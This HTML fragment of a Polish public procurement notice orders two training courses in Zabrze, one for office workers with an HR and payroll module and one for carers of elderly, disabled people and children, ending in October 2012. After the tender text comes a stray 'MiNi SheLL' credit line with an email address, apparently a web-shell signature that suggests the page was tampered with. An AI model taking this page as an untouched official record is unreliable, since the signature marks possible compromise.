<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pracownik administracyjno-biurowy z modułem kadry i płace.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Program powinien zawierać m.in. zagadnienia dotyczące : organizację pracy biurowej, obsługę urządzeń biurowych, zasady obsługi interesanta. Savoir vivre pracownika biurowego, wybrane-podstawowe zagadnienia ekonomiczne i prawne, podstawy rachunkowości, obsługa i użytkowanie biurowych programów komputerowych, obsługa Internetu i poczty elektronicznej, tworzenie dokumentów związanych z pracą biurową, dokumentacja księgowa zakładu pracy, wybrane elementy zagadnień kadrowych, Prawo pracy , system, rozkład i okres rozliczeniowy czasu pracy, niewykonywanie pracy a prawo do wynagrodzenia, zasady udzielania innych urlopów pracowniczych i zwolnień od pracy .
A)	UCZESTNICY
W szkoleniu weźmie udział od  3 do 10 uczestników/uczestniczek projektu systemowego.
W przypadku, gdy wystąpi okoliczność, że zbędnym lub niemożliwym stanie się przeprowadzenie szkolenia dla liczby osób wskazanych w specyfikacji istotnych warunków zamówienia, Zamawiający zastrzega sobie prawo zmniejszenia liczby skierowanych osób na kurs.
B)	FORMA i CZAS TRWANIA
1. Realizacja odbywać się będzie 5 dni w tygodniu od poniedziałku do piątku
2. Dzienny wymiar godzin dydaktycznych nie powinien przekroczyć  5 godzin lekcyjnych ( 1 godzina lekcyjna = 45 minut) z uwzględnieniem przerwy kawowej 15 minut oraz przerwy na obiad 30 minut.
3. Ilość godzin na każdego uczestnika  - 200( w tym minimum 100 godzin praktycznych)
C) MIEJSCE REALIZACJI
Miejsce realizacji szkolenia -pomieszczenie na terenie miasta Zabrze.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Opiekun/ka osób starszych-niepełnosprawnych i dzieci.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Program powinien zawierać m.in. zagadnienia dotyczące usług pielęgniarsko - opiekuńczych tj. m.in. higieny i pielęgnacji podopiecznych, pierwsza pomoc, komunikacja i współpraca z podopiecznym i jego rodziną, organizowanie opieki zdrowotnej i czasu wolnego podopiecznemu w opiece domowej, zasady etyki zawodowej, wiedza teoretyczna na temat wieku podeszłego, niemowlęcego i dziecięcego, pielęgnowanie dziecka zdrowego, obserwowanie i kontrolowanie prawidłowego rozwoju psychicznego i fizycznego dziecka. Dolegliwości w okresie choroby i ich przyczyny, przygotowywanie posiłków, podstawy prawne. Opieka nad osobą niepełnosprawną.
A)	UCZESTNICY
W szkoleniu weźmie udział od  5 do 18 uczestników/uczestniczek projektu systemowego.
W przypadku, gdy wystąpi okoliczność, że zbędnym lub niemożliwym stanie się przeprowadzenie szkolenia dla liczby osób wskazanych w specyfikacji istotnych warunków zamówienia, Zamawiający zastrzega sobie prawo zmniejszenia liczby skierowanych osób na kurs.
B)	FORMA i CZAS TRWANIA
1. Realizacja odbywać się będzie 5 dni w tygodniu od poniedziałku do piątku
2. Dzienny wymiar godzin dydaktycznych nie powinien przekroczyć  5 godzin lekcyjnych ( 1 godzina lekcyjna = 45 minut) z uwzględnieniem przerwy kawowej 15 minut oraz przerwy na obiad 30 minut.
3. Ilość godzin na każdego uczestnika  - 100
C) MIEJSCE REALIZACJI
Miejsce realizacji szkolenia -pomieszczenie na terenie miasta Zabrze.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com